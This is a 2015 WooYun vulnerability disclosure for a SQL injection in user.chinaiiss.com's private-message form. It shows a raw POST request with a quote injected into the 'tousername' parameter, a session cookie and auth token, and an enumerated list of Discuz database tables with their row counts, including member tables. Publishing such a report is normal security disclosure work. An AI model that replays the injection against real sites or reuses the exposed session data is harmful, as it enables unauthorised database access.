当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131686

漏洞标题:中国战略网某站存在SQL注入漏洞

相关厂商:chinaiiss.com

漏洞作者: 路人甲

提交时间:2015-08-05 10:24

修复时间:2015-09-19 14:50

公开时间:2015-09-19 14:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-05: 细节已通知厂商并且等待厂商处理中
2015-08-05: 厂商已经确认,细节仅向厂商公开
2015-08-15: 细节向核心白帽子及相关领域专家公开
2015-08-25: 细节向普通白帽子公开
2015-09-04: 细节向实习白帽子公开
2015-09-19: 细节向公众公开

简要描述:

详细说明:

POST /index.php?do=pm&type=sendpm HTTP/1.1
Host: user.chinaiiss.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://user.chinaiiss.com/index.php?do=pm&type=makepm&uid=999692&touid=997121
Content-Length: 65
Cookie: Hm_lvt_cd0a687f19db4e63c481a5b03c59f4e3=1438483193,1438601914; vjuids=-136ab277f.14eec479d43.0.9a7d0ed52e4a58; vjlast=1438483193; CNZZDATA215831=cnzz_eid%3D548603228-1438482024-http%253A%252F%252Fwww.chinaiiss.com%252F%26ntime%3D1438692642; auth=34abz51SzILVhmMHju%2FjTXsYy%2B8o4QpTJetQeCPdMwB7ra78t2FUWMdXbOkSjlB8c2mGJd3AG6WGusXXZ5wg; Hm_lpvt_cd0a687f19db4e63c481a5b03c59f4e3=1438694000; cityid=0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
tousername=jj2230373403'&content=rrrrrrrrrrrrrrrrrrrrrrrrrrgggggg

tousername参数~

1.jpg

2.png

Database: discuz
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| cdb_creditslog | 1541271 |
| cdb_posts | 938439 |
| cdb_threadtags | 638428 |
| cdb_favoritethreads | 474649 |
| cdb_prompt | 307994 |
| cdb_memberfields | 303480 |
| cdb_members | 303213 |
| cdb_threads | 193687 |
| cdb_attachments | 109519 |
| cdb_ratelog | 69799 |
| cdb_onlinetime | 58324 |
| cdb_tags | 51464 |
| cdb_mytasks | 40777 |
| cdb_threadsmod | 40065 |
| cdb_member_connect | 16706 |
| cdb_attachmentfields | 15829 |
| cdb_grab_signin | 13547 |
| cdb_memberrecommend | 12592 |
| cdb_promptmsgs | 11123 |
| cdb_medallog | 8985 |
| cdb_connect_memberbindlog | 8863 |
| cdb_modworks | 4277 |
| cdb_polloptions | 2713 |
| cdb_xwb_bind_info | 1283 |
| cdb_debateposts | 1279 |
| cdb_postposition | 1054 |
| cdb_spacecaches | 1048 |
| cdb_regips | 1010 |
| cdb_favorites | 866 |
| cdb_rsscaches | 855 |
| cdb_warnings | 825 |
| cdb_polls | 594 |
| cdb_smilies | 532 |
| cdb_feeds | 414 |
| cdb_statvars | 320 |
| cdb_settings | 260 |
| cdb_favoriteforums | 236 |
| cdb_access | 235 |
| cdb_membermagics | 203 |
| cdb_stylevars | 189 |
| cdb_moderators | 164 |
| cdb_xwb_bind_thread | 159 |
| cdb_magiclog | 129 |
| cdb_family_record | 81 |
| cdb_words | 72 |
| cdb_medals | 71 |
| cdb_forumfields | 65 |
| cdb_forums | 65 |
| cdb_typeoptions | 65 |
| cdb_debates | 61 |
| cdb_request | 61 |
| cdb_pluginvars | 58 |
| cdb_caches | 56 |
| cdb_stats | 52 |
| cdb_banned | 48 |
| cdb_faqs | 34 |
| cdb_usergroups | 34 |
| cdb_forumlinks | 32 |
| cdb_taskvars | 32 |
| cdb_ks_mod_money | 26 |
| cdb_crons | 17 |
| cdb_admincustom | 15 |
| cdb_rewardlog | 13 |
| cdb_magics | 12 |
| cdb_pluginhooks | 11 |
| cdb_projects | 11 |
| cdb_tasks | 11 |
| cdb_itempool | 10 |
| cdb_forumrecommend | 9 |
| cdb_prompttype | 9 |
| cdb_plugins | 8 |
| cdb_reportlog | 7 |
| cdb_admingroups | 6 |
| cdb_imagetypes | 6 |
| cdb_ks_mod_log | 6 |
| cdb_ks_mod_pingjia | 6 |
| cdb_onlinelist | 6 |
| cdb_bbcodes | 5 |
| cdb_navs | 5 |
| cdb_ranks | 5 |
| cdb_styles | 4 |
| cdb_templates | 4 |
| cdb_typemodels | 4 |
| cdb_advertisements | 3 |
| cdb_threadtypes | 3 |
| cdb_activities | 2 |
| cdb_addons | 2 |
| cdb_adminsessions | 1 |
| cdb_failedlogins | 1 |
| cdb_fam | 1 |
| cdb_jobcenter | 1 |
| cdb_ks_mod_admin | 1 |
| cdb_magicmarket | 1 |
+---------------------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-05 14:49

厂商回复:

已修复

最新状态:

暂无